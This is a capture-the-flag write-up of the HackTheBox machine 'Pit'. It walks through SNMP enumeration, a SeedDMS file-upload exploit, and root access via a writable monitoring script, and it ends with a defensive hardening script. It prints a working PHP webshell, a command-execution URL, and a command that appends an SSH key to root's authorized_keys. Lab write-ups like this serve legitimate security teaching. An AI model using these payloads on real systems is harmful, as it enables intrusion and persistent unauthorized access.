HackTheBox - Pit
Morten Hansen • January 30, 2022
PIT
IP: 10.10.10.241
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http nginx 1.14.1
http-server-header: nginx/1.14.1
9090/tcp open ssl/zeus-admin?
PORT STATE SERVICE
161/udp open|filtered snmp
SNMP on port 161:
snmpwalk -c public -v1 10.10.10.241 1 -On
Check the certificate at http://10.10.10.241:9090; it shows the hostname dms-pit.htb. Add 10.10.10.241 dms-pit.htb to /etc/hosts.
Enumerate via SNMP and find the username michelle, as well as the path /var/www/html/seeddms51x/seeddms. Try dms-pit.htb/var/www/html/seeddms51x/seeddms and we find a login page. Log in with username michelle and password michelle. Then research SeedDMS and find an exploit: https://packetstormsecurity.com/files/153383/SeedDMS-Remote-Command-Execution.html
Upload a file containing a PHP backdoor:
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Step 3: After uploading the file, check the document id corresponding to the document.
Step 4: http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=ls -laR ../../.
Note: Here "data" and "1048576" are the default folders where uploaded files are saved.
Check the SeedDMS configuration file through the webshell. The file appears to be full of blank spaces, so view the page source instead and find the password ied^ieY6xoquu.
Log in at 10.10.10.241:9090 with username michelle and the password found earlier. The website provides a terminal, and it is possible to add SSH keys there so we can SSH in from our own terminal.
ROOT
Find /usr/bin/monitor from the SNMP walk.
The file has +x permissions, so run getfacl on it to show the full permissions, including ACLs.
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
This tells us that monitor runs every script in /usr/local/monitoring whose name starts with check and ends with sh. We need to place a script there with a matching name, e.g. check1234sh, and then run snmpwalk again. The output is shown in the terminal.
echo "echo PUB-key >> /root/.ssh/authorized_keys" > /usr/local/monitoring/checkscript.sh
Because of PAM restrictions we can't read files, but appending works. Append our public SSH key to /root/.ssh/authorized_keys and we are able to SSH in as root.
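The monitor loop above trusts every file matching check*sh, so anyone who can write into /usr/local/monitoring gets command execution as the user running monitor, which is how root is obtained here. The hardened loop below is an added example, not the box's own script or part of the original writeup: it refuses a directory or script unless it is owned by the expected user and not writable by anyone else, including through POSIX ACL entries of the kind getfacl reveals. MONITOR_DIR, MONITOR_OWNER and the function names are assumed; both variables can be overridden for testing.

```shell
#!/bin/bash
# Hardened replacement for: for script in /usr/local/monitoring/check*sh; do /bin/bash $script; done
MONITOR_DIR="${MONITOR_DIR:-/usr/local/monitoring}"
MONITOR_OWNER="${MONITOR_OWNER:-root}"   # assumed owner; override for testing

# acl_grants_write PATH -> 0 if a *named* user/group ACL entry grants write.
# The owner entry "user::rwx" has an empty name field and is ignored.
acl_grants_write() {
  command -v getfacl >/dev/null 2>&1 || return 1
  getfacl -p "$1" 2>/dev/null | grep -Eq '^(user|group):[^:]+:[r-]w'
}

# path_is_locked PATH -> 0 if PATH is a real (non-symlink) object owned by
# MONITOR_OWNER, not group- or world-writable, and has no ACL granting write.
path_is_locked() {
  local p="$1"
  [ -e "$p" ] || return 1
  [ -L "$p" ] && return 1      # a symlink could point into a writable location
  [ -n "$(find "$p" -maxdepth 0 -user "$MONITOR_OWNER" ! -perm -020 ! -perm -002 2>/dev/null)" ] || return 1
  acl_grants_write "$p" && return 1
  return 0
}

# run_checks -> runs each check*sh that passes path_is_locked.
# Returns 2 if the directory itself is untrusted, 1 if any script was skipped, 0 otherwise.
run_checks() {
  local script failed=0
  if ! path_is_locked "$MONITOR_DIR"; then
    echo "REFUSED: $MONITOR_DIR is not owned by $MONITOR_OWNER or is writable by others" >&2
    return 2
  fi
  for script in "$MONITOR_DIR"/check*sh; do
    [ -e "$script" ] || continue
    if path_is_locked "$script"; then
      /bin/bash "$script"
    else
      echo "SKIPPED: $script is not owned by $MONITOR_OWNER or is writable by others" >&2
      failed=1
    fi
  done
  return "$failed"
}

# Invoke as "monitor.sh run" from the SNMP extend hook; functions only when sourced.
if [ "${1:-}" = "run" ]; then
  run_checks
fi
```

A non-zero exit from run_checks is the detection signal: log it, since a writable check directory or script is exactly the condition that turned the SNMP hook into a privilege escalation path.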